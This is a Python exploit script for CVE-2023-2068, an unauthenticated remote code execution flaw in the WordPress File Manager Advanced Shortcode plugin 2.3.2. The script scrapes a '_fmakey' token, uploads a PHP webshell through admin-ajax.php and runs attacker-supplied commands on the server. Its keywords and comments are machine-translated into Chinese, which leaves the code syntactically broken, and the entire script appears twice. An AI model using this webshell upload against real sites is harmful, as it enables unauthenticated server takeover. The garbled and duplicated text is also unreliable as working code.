#利用title:文件管理器高级快捷代码2.3.2-未身份定制的远程代码执行(RCE)
#date: 05/31/2023
#利用作者: Mateus Machado Tesser
#供应商HomePage3360 https://advancedfilemanager.com/
#版本:文件经理高级短代码2.3.2
#在: WordPress 6.1/linux(Ubuntu)5.15测试
#CVE: CVE-2023-2068
导入请求
进口JSON
导入pprint
导入系统
导入
process='\ 033 [1; 34; 40m [*] \ 033 [0m'
成功='\ 033 [1; 32; 40m [+] \ 033 [0m'
fail='\ 033 [1; 31; 40m [ - ] \ 033 [0m'
TRY:
命令=sys.argv [2]
ip=sys.argv [1]
如果Len(命令)1:
经过
如果IP:
经过
其他:
打印(f'use: {sys.argv [0]} ip命令')
Except:
经过
url='http://'+ip+'/'#文件经理的路径高级短代码面板
打印(f'{process}搜索fmakey')
TRY:
r=requests.get(url)
raw_fmakey=r.text
fmakey=re.findall('_ fmakey。
如果len(fmakey)==0:
print(f'{fail}找不到fmakey!')
Except:
print(f'{fail}找不到fmakey!')
打印(f'{process}通过Ajax利用未经验证的远程代码执行!')
url='http://'+ip+'/wp-admin/admin-ajax.php'
标题={'user-agent':'Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebKit/537.36(Khtml,例如Gecko)chrome/104.0.5112.102 boundard=----- webkitformboundaryii52dgcot37rixrs1','accept':'/'}
data='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data;名称=\'reqid \'\ r \ n \ r \ n \ n \ r \ n \ n \ r \ n \ n \ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data; name=\'cmd \'\ r \ n \ r \ n \ n \ n \ nupload \ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data;名称=\'target \'\ r \ n \ r \ n \ n \ nl1_lw \ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data;名称=\'哈希[L1_CG5NLWNSAXBHCNQTAGFJA2VYLWHHY2TLCI5WBMC] \'\ r \ n \ n \ r \ n \ n \ n \ n \ n \ n \ n \ n \ nexploit.php \ php \ r \ r \ r \ r \ r \ n''''
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data;名称=\'action \'\ r \ n \ r \ n \ n \ nfma_load_shortcode_fma_ui \ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data;名称=\'_ fmakey \'\ r \ n \ r \ n'+fmakey+'\ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data; name=\'路径\'\ r \ n \ r \ n \ n \ r \ n \ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data; name=\'url \'\ r \ n \ r \ n \ n \ r \ n \ r \ r \ n \ n \ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data;名称=\'w \'\ r \ n \ r \ n \ n \ n \ nfalse \ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data; name=\'r \'\ r \ n \ r \ n \ n \ r \ ntrue \ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data;名称=\'hide \'\ r \ n \ r \ n \ r \ nplugins \ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data; name=\'操作\'\ r \ n \ r \ n \ n \ nupload,下载\ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data; name=\'path_type \'\ r \ n \ r \ n \ n \ n \ nininside \ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data;名称=\'hide_path \'\ r \ n \ r \ n \ n \ nno \ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data;名称=\'enable_trash \'\ r \ n \ r \ n \ n \ n \ r \ nno \ r \ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data; name=\'upload_allow \'\ r \ n \ r \ n \ n \ n \ n \ n \ n \ n \ n \ n \ n \ n \ n \ n \ n \ n \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data;名称=\'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data;名称=\'upload [] \'; filename=\'exploit2.php \'\ r \ ncontent-type: text/x-php \ r \ n \ n \ r \ r \ n \ n \ r \ r \ n \ n?php system($ _ get ['cmd'])
data +='----- webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data; name=\'mtime [] \'\ r \ n \ r \ n \ n \ r \ n \ n \ r \ n -------------------------------------------------------------------------------------------------
r=requests.post(url,标头=标题,data=data)
print(f'{process}将ajax请求发送给: {url}')
如果R.Text:中的“ eruploadmime”
打印(f'{fail}利用失败!')
sys.exit()
Elif R.Headers ['content-type']。startswith('text/html'):
打印(f'{fail}利用失败!尝试更改_fmakey')
sys.exit(0)
其他:
打印(f'{success}利用成功执行!')
剥削=json.loads(r.text)
url=''
打印(f'{process}使用webshell获取URL')
因为我在剥削['添加'] :
url=i ['url']
print(f'{process}执行'{command}'')
r=requests.get(url+'?cmd='+命令)
print(f'{Success}应用程序返回({len(r.text)}长度): \ n'+r.text)
#date: 05/31/2023
#利用作者: Mateus Machado Tesser
#供应商HomePage3360 https://advancedfilemanager.com/
#版本:文件经理高级短代码2.3.2
#在: WordPress 6.1/linux(Ubuntu)5.15测试
#CVE: CVE-2023-2068
导入请求
进口JSON
导入pprint
导入系统
导入
process='\ 033 [1; 34; 40m [*] \ 033 [0m'
成功='\ 033 [1; 32; 40m [+] \ 033 [0m'
fail='\ 033 [1; 31; 40m [ - ] \ 033 [0m'
TRY:
命令=sys.argv [2]
ip=sys.argv [1]
如果Len(命令)1:
经过
如果IP:
经过
其他:
打印(f'use: {sys.argv [0]} ip命令')
Except:
经过
url='http://'+ip+'/'#文件经理的路径高级短代码面板
打印(f'{process}搜索fmakey')
TRY:
r=requests.get(url)
raw_fmakey=r.text
fmakey=re.findall('_ fmakey。
如果len(fmakey)==0:
print(f'{fail}找不到fmakey!')
Except:
print(f'{fail}找不到fmakey!')
打印(f'{process}通过Ajax利用未经验证的远程代码执行!')
url='http://'+ip+'/wp-admin/admin-ajax.php'
标题={'user-agent':'Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebKit/537.36(Khtml,例如Gecko)chrome/104.0.5112.102 boundard=----- webkitformboundaryii52dgcot37rixrs1','accept':'/'}
data='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data;名称=\'reqid \'\ r \ n \ r \ n \ n \ r \ n \ n \ r \ n \ n \ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data; name=\'cmd \'\ r \ n \ r \ n \ n \ n \ nupload \ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data;名称=\'target \'\ r \ n \ r \ n \ n \ nl1_lw \ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data;名称=\'哈希[L1_CG5NLWNSAXBHCNQTAGFJA2VYLWHHY2TLCI5WBMC] \'\ r \ n \ n \ r \ n \ n \ n \ n \ n \ n \ n \ n \ nexploit.php \ php \ r \ r \ r \ r \ r \ n''''
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data;名称=\'action \'\ r \ n \ r \ n \ n \ nfma_load_shortcode_fma_ui \ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data;名称=\'_ fmakey \'\ r \ n \ r \ n'+fmakey+'\ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data; name=\'路径\'\ r \ n \ r \ n \ n \ r \ n \ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data; name=\'url \'\ r \ n \ r \ n \ n \ r \ n \ r \ r \ n \ n \ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data;名称=\'w \'\ r \ n \ r \ n \ n \ n \ nfalse \ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data; name=\'r \'\ r \ n \ r \ n \ n \ r \ ntrue \ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data;名称=\'hide \'\ r \ n \ r \ n \ r \ nplugins \ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data; name=\'操作\'\ r \ n \ r \ n \ n \ nupload,下载\ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data; name=\'path_type \'\ r \ n \ r \ n \ n \ n \ nininside \ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data;名称=\'hide_path \'\ r \ n \ r \ n \ n \ nno \ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data;名称=\'enable_trash \'\ r \ n \ r \ n \ n \ n \ r \ nno \ r \ r \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data; name=\'upload_allow \'\ r \ n \ r \ n \ n \ n \ n \ n \ n \ n \ n \ n \ n \ n \ n \ n \ n \ n \ n'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data;名称=\'
data +='------ webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data;名称=\'upload [] \'; filename=\'exploit2.php \'\ r \ ncontent-type: text/x-php \ r \ n \ n \ r \ r \ n \ n \ r \ r \ n \ n?php system($ _ get ['cmd'])
data +='----- webkitformboundaryii52dgcot37rixrs1 \ r \ ncontent-disposition: form-data; name=\'mtime [] \'\ r \ n \ r \ n \ n \ r \ n \ n \ r \ n -------------------------------------------------------------------------------------------------
r=requests.post(url,标头=标题,data=data)
print(f'{process}将ajax请求发送给: {url}')
如果R.Text:中的“ eruploadmime”
打印(f'{fail}利用失败!')
sys.exit()
Elif R.Headers ['content-type']。startswith('text/html'):
打印(f'{fail}利用失败!尝试更改_fmakey')
sys.exit(0)
其他:
打印(f'{success}利用成功执行!')
剥削=json.loads(r.text)
url=''
打印(f'{process}使用webshell获取URL')
因为我在剥削['添加'] :
url=i ['url']
print(f'{process}执行'{command}'')
r=requests.get(url+'?cmd='+命令)
print(f'{Success}应用程序返回({len(r.text)}长度): \ n'+r.text)